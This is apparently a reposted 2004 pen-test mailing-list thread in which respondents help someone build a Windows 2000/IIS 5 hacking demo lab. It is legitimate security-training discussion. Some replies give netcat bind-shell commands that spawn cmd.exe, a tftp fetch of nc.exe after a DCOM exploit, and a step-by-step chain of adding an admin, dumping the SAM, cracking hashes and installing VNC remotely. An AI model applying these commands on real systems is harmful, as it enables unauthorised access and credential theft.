QODS ec

Friday, June 11, 2004

SEC: Hacking Demo and Test Lab

raza sharif Fri, Jun 11, 2004 at 7:41AM
To: pen-test@securityfocus.com


Hi Folks ,

Im doing some advanced Hacking Demos for management and also Corporates etc.

I have a installed windows 2000 server and iis 5.0 on VMWARE GSX server.

Im using Webdav and other exploits that all basically should spawn a shell using netcat.

Im using XP as my attacking machine.

Prob at the moment is Netcat will not spawn a shell regardless of what i try.

Any ideas ? i checked the install it is windows 2000 500.1295 no reference to service packs etc. it's a default install.

Also what are good demo's etc to run to show real hacking on windows 2000 , iis etc..that i can get to work

thanks

Raza

Raza@raza.demon.co.uk
Martin Wasson Fri, Jun 11, 2004 at 11:33AM
To: raza sharif
Cc: pen-test@securityfocus.com


Raza,
A few things. I wouldn't really call this advanced. Why are you hacking
from XP instead of Linux? Get yourself a Linux box. These exploits of
which you write do not spawn shells using netcat. Netcat can bind shells
after you install it. You have to pop the Win2k box first, with something
like oc192-dcom.c. This exploit will get you a shell, then have it GET
(tftp) the files (like netcat) from your Linux box. Once the win2k box has
received nc.exe, run "nc -L -p 1234 -e cmd.exe" AFTER you've started netcat
on you Linux box (nc 1234).

Does that help?

Regards,

Marty Wasson, CISSP, CEH, IAM
Sr. Information Security Analyst
Global Information Security
MasterCard International
(636) 722-2372
martin_wasson@mastercard.com

"Men occasionally stumble over the truth, but most of them pick themselves
up and hurry off as if nothing ever happened." Winston Churchill

--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

CONFIDENTIALITY NOTICE
This E-mail message and any documents which accompany it are intended only
for the use of the individual or entity to which addressed, and may contain
information that is privileged, confidential or exempt from disclosure
under applicable law. If the reader is not the intended recipient, any
disclosure, distribution or other use of this E-mail message is prohibited.
If you have received this E-mail message in error, please notify the sender
immediately. Thank you.
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

raza sharif
co.uk> cc: (bcc: Martin Wasson/STL/MASTERCARD)
Subject: Hacking Demo and Test Lab
06/11/2004 06:41
AM
[Quoted text hidden]

-----------------------------------------
CONFIDENTIALITY NOTICE
This e-mail message and any attachments are only for the use of the intended recipient and may contain information that is privileged, confidential or exempt from disclosure under applicable law. If you are not the intended recipient, any disclosure, distribution or other use of this e-mail message or attachments is prohibited. If you have received this e-mail message in error, please delete and notify the sender immediately. Thank you.

Grissett, Chris CONT Ciber Fri, Jun 11, 2004 at 10:49AM
To: raza sharif , pen-test@securityfocus.com
Try this command on the remote machine
nc -l -p 23 -t -e cmd.exe

This allows nc to listen on port 23 for connections. When a connection is
made it will spawn a cmd[dos] shell, or whatever program you want to exec.
Hope that helps. If that fails, you can really impress the execs by using
knoppix-std (http://knoppix-std.org), to do all your hacking demos. Or if
you'd like, you could give me access to your lab, and Id do it for you. I'm
kidding, of course I couldn't do that, plus it would violate numerous laws
and ethics :) Are you familiar with linux?

Christopher Grissett
Security Analyst
Network Enterprise Security Team
[Quoted text hidden]
Victor Chapela Fri, Jun 11, 2004 at 1:59PM
To: raza sharif , pen-test@securityfocus.com
I am not sure about VMWare, I also had some problems running demos
consistently and decided to use a separate machine.

I usually do my demos with a similar configuration XP -> 2000.

A good 5 min sketch is:
- get a remote shell using Jill, iis5hack or dcomexploit
- You end up as NT Authority/SYSTEM in all cases, therefore you can add
yourself as an administrator
- connect to the admin$ share using your new credentials
- dump the SAM file with pwdump3
- crack some hashes using john
- copy winvnc to system32
- add your vnc password to the remote registry
- install and start winvnc remotely
- start a VNC session

Even though you will rarely need to install vnc while pen testing, I have
found that for demos it is a very good way to get the point through.

Good luck

Victor
[Quoted text hidden]
Grissett, Chris CONT Ciber Fri, Jun 11, 2004 at 10:59AM
To: raza sharif , pen-test@securityfocus.com
I guess I should have included a working example:

Assuming that you already have nc on the 2000 box, run this command:

nc -l -p 23 -t -e cmd.exe

Then on your xp box run this command:

nc xxx.xxx.xxx.xxx 23

replace the x's with the ip of the 2000 server box. The 23 is for the port
you assigned it earlier.

Oh, when you installed 2000 server, what type of connection did you choose.
You should choose to have 2000 server have direct access to the host's
Ethernet card and its connections. Do you have any personal firewalls
running at all? Are these two machines connected via a hub or switch.
[Quoted text hidden]

0 Comments:

Post a Comment

<< Home


Get Firefox!